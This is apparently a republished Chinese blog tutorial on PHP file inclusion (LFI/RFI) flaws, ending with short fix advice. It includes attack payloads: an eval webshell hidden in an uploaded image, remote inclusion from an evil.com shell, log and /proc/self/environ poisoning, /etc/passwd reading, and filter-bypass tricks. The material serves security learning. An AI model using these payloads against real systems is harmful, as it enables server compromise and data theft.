百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

网络安全之文件包含漏洞总结 文件包含漏洞攻击

myzbx 2024-12-16 14:53 103 浏览

介绍

文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。

但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。

几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至没有,问题在于语言设计的弊端。因此后续均以PHP为主。

文件包含漏洞分类

PHP中的文件包含分为本地文件包含远程文件包含

LFI

本地文件包含 Local File Include (LFI)

所包含文件内容符合PHP语法规范,任何扩展名都可以被PHP解析。

所包含文件内容不符合PHP语法规范,会暴露其源代码(相当于文件读取)。

RFI

远程文件包含 Remote File Include (RFI)

如果要使用远程包含功能,首先需要确定PHP是否已经开启远程包含功能选项(php默认关闭远程包含功能:allow_url_include=off),开启远程包含功能需要在php.ini配置文件中修改。

远程包含与本地包含没有区别,无非是支持远程加载,更容易getshell,无论是哪种扩展名,只要遵循PHP语法规范,PHP解析器就会对其解析。

PHP的文件包含函数

PHP中提供了四个文件包含的函数,分别是include()、include_once()、require()和require_once()。这四个函数都可以进行文件包含,但作用并不一样。

  • include:找不到被包含的文件时只会产生警告,脚本将继续执行。
  • include_once:和include()语句类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
  • require:找不到被包含的文件时会产生致命错误,并停止脚本。
  • require_once:和require()语句类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。

漏洞示例代码

****<?php****
// index.php
$file = $_GET[ 'file' ];
****include****$file
****?>****

快速启动一个简单的解析php的web server

php -S 127.0.0.1:9999

测试:

http://127.0.0.1:9999/index.php?file=/etc/passwd

【一>所有资源关注我,私信回复“资料”获取<一】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

利用任意文件读取

如果内容不符合php语法,就会直接返回文件内容,也就等于读取任意文件,和任意文件读取/下载一样,就不细说了

使用PHP封装协议

PHP带有很多内置URL风格的封装协议

php://filter

正常情况下,包含php文件会直接执行其中的代码,但如果我们想获取到php文件的源码,如config.php,那么我们可以通过封装协议php://filter来读取

http://127.0.0.1:9999/index.php?file=php://filter/read=convert.base64-encode/resource=shell.png

php://input

**利用条件:**需要开启allow_url_include=on,对allow_url_fopen不做要求

RFI getshell

如果支持远程文件包含,那么直接http://127.0.0.1:9999/index.php?file=http://evil.com/shell.php即可getshell,因为出现的情况实在是太少了,就不多说了。

LFI+文件上传 getshell

这是本地文件包含漏洞想要getshell的最容易想到的方法之一。

网站存在LFI漏洞,同时存在上传功能,如上传头像、证明信息等,那么我们可以上传一个包含恶意代码的任意后缀文件,如.png

其中.png的内容包含

<?php @eval($_GET['shell']);?>

利用如下:

http://127.0.0.1:9999/index.php?file=shell.png&shell=phpinfo();

[!tip]

可能上传的文件中干扰因素过多,导致利用的展示界面很乱,那么我们可以通过file_put_contents()等函数单独再写一个webshell到其他文件中。

LFI+日志文件 getshell

日志文件往往会包含我们的请求记录,如果我们知道日志的文件位置,那么我们就可以将恶意的php代码写入到日志中,然后再通过文件包含漏洞就可以执行相关的代码。

举例:

URL访问

http://127.0.0.1:9999/index.php?file=shell.png&test=<?php @eval($_GET['shell']);?>

payload会被记录到日志文件中,此时日志文件如下

我们只需要包含这个日志文件,那么就可以getshell

日志默认路径:

可能会有所出入,一切以实际情况为准

路径

tomcat

/usr/local/tomcat/logs/localhost_access_log.2020-09-21.txt

apache+linux

/var/log/apache2/access.log/var/log/httpd/access.log/etc/httpd/logs/access.log

nginx

/var/log/nginx/access.log/usr/local/nginx/logs/access.log

LFI+/proc/self/environgetshell

在linux中,如果php以cgi方式运行,那么/proc/self/environ中会包含请求头中的UA信息,也就可以getshell

GET lfi.php?file=../../../../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>

LFI+phpinfo getshell

除了需要存在一个LFI漏洞外,还需要存在一个phpinfo()页面

原理:向phpinfo()页面POST上传一个文件,PHP就会将文件保存成一个临时文件,路径通常为:/tmp/php[6个随机字符],这个临时文件,在请求结束后就会被删除。有点类似于条件竞争的操作。

利用时需要修改工具中的参数和目标参数适配

LFI+session getshell

很鸡肋很鸡肋,要求你能控制session才行,一般我们可以先看下session中的内容哪些部分是可控的

php的session文件的保存路径可以在phpinfo的session.save_path看到。

常见的php-session存放位置:

/var/lib/php/sess_PHPSESSID

/var/lib/php/sessions

/tmp/sess_PHPSESSID

/tmp/sessions/sess_PHPSESSID

如果可以控制session的内容,那么相当于可以控制文件/var/lib/php/sessions的内容,结合前面的操作就可以直接getshell了

绕过指定前缀

漏洞代码:

<?php
$file = $_GET['file'];
include'/var/www/html/'.$file;
?>

绕过方法:

通过…/回溯符跳转到其他目录,如../../../proc/self/environ

还是通过回溯符…/,主要是对内容进行编码

URL编码

2次URL编码

容器/服务器支持的编码,…%c0%af== …/,…%c1%9c == …\

指定后缀

漏洞代码:

<?php
$file = $_GET['file'];
include****$file.'/test/test.php';
?>

绕过方法:

支持RFI的情况下,可以用?和#来绕过,?后面表示参数,#后面表示锚点,都不会影响到实际的URL

利用伪协议zip://和phar://,以zip为例,先创建一个压缩包,压缩目录为test/test/test.php,然后利用为zip://xxx.zip#test即可

php < 5.2.8的情况下,可以使用长度截断,只需要不断的重复./即可,linux下4096字节时会达到最大值,在window下是256字节,在达到最大值后,后面的部分将会被省略。如 shell.php/./././././省略/./././;注意不能超过容器支持的最大长度,不然会提示GET请求太长。

php < 5.3.4且magic_quotes_gpc=off的情况下,存在00截断,和上传中的00截断类似,让后端误以为这是结束符

修复建议

过滤.(点)/(反斜杠)\(反斜杠)等特殊字符

尽量关闭allow_url_include配置

PHP 中使用 open_basedir 配置限制访问在指定的区域

对需要包含的文件设置文件白名单

相关推荐

如何设计一个优秀的电子商务产品详情页

加入人人都是产品经理【起点学院】产品经理实战训练营,BAT产品总监手把手带你学产品电子商务网站的产品详情页面无疑是设计师和开发人员关注的最重要的网页之一。产品详情页面是客户作出“加入购物车”决定的页面...

怎么在JS中使用Ajax进行异步请求?

大家好,今天我来分享一项JavaScript的实战技巧,即如何在JS中使用Ajax进行异步请求,让你的网页速度瞬间提升。Ajax是一种在不刷新整个网页的情况下与服务器进行数据交互的技术,可以实现异步加...

中小企业如何组建,管理团队_中小企业应当如何开展组织结构设计变革

前言写了太多关于产品的东西觉得应该换换口味.从码农到架构师,从前端到平面再到UI、UE,最后走向了产品这条不归路,其实以前一直再给你们讲.产品经理跟项目经理区别没有特别大,两个岗位之间有很...

前端监控 SDK 开发分享_前端监控系统 开源

一、前言随着前端的发展和被重视,慢慢的行业内对于前端监控系统的重视程度也在增加。这里不对为什么需要监控再做解释。那我们先直接说说需求。对于中小型公司来说,可以直接使用三方的监控,比如自己搭建一套免费的...

Ajax 会被 fetch 取代吗?Axios 怎么办?

大家好,很高兴又见面了,我是"高级前端进阶",由我带着大家一起关注前端前沿、深入前端底层技术,大家一起进步,也欢迎大家关注、点赞、收藏、转发!今天给大家带来的主题是ajax、fetch...

前端面试题《AJAX》_前端面试ajax考点汇总

1.什么是ajax?ajax作用是什么?AJAX=异步JavaScript和XML。AJAX是一种用于创建快速动态网页的技术。通过在后台与服务器进行少量数据交换,AJAX可以使网页实...

Ajax 详细介绍_ajax

1、ajax是什么?asynchronousjavascriptandxml:异步的javascript和xml。ajax是用来改善用户体验的一种技术,其本质是利用浏览器内置的一个特殊的...

6款可替代dreamweaver的工具_替代powerdesigner的工具

dreamweaver对一个web前端工作者来说,再熟悉不过了,像我07年接触web前端开发就是用的dreamweaver,一直用到现在,身边的朋友有跟我推荐过各种更好用的可替代dreamweaver...

我敢保证,全网没有再比这更详细的Java知识点总结了,送你啊

接下来你看到的将是全网最详细的Java知识点总结,全文分为三大部分:Java基础、Java框架、Java+云数据小编将为大家仔细讲解每大部分里面的详细知识点,别眨眼,从小白到大佬、零基础到精通,你绝...

福斯《死侍》发布新剧照 &quot;小贱贱&quot;韦德被改造前造型曝光

时光网讯福斯出品的科幻片《死侍》今天发布新剧照,其中一张是较为罕见的死侍在被改造之前的剧照,其余两张剧照都是死侍在执行任务中的状态。据外媒推测,片方此时发布剧照,预计是为了给不久之后影片发布首款正式预...

2021年超详细的java学习路线总结—纯干货分享

本文整理了java开发的学习路线和相关的学习资源,非常适合零基础入门java的同学,希望大家在学习的时候,能够节省时间。纯干货,良心推荐!第一阶段:Java基础重点知识点:数据类型、核心语法、面向对象...

不用海淘,真黑五来到你身边:亚马逊15件热卖爆款推荐!

Fujifilm富士instaxMini8小黄人拍立得相机(黄色/蓝色)扫二维码进入购物页面黑五是入手一个轻巧可爱的拍立得相机的好时机,此款是mini8的小黄人特别版,除了颜色涂装成小黄人...

2025 年 Python 爬虫四大前沿技术:从异步到 AI

作为互联网大厂的后端Python爬虫开发,你是否也曾遇到过这些痛点:面对海量目标URL,单线程爬虫爬取一周还没完成任务;动态渲染的SPA页面,requests库返回的全是空白代码;好不容易...

最贱超级英雄《死侍》来了!_死侍超燃

死侍Deadpool(2016)导演:蒂姆·米勒编剧:略特·里斯/保罗·沃尼克主演:瑞恩·雷诺兹/莫蕾娜·巴卡林/吉娜·卡拉诺/艾德·斯克林/T·J·米勒类型:动作/...

停止javascript的ajax请求,取消axios请求,取消reactfetch请求

一、Ajax原生里可以通过XMLHttpRequest对象上的abort方法来中断ajax。注意abort方法不能阻止向服务器发送请求,只能停止当前ajax请求。停止javascript的ajax请求...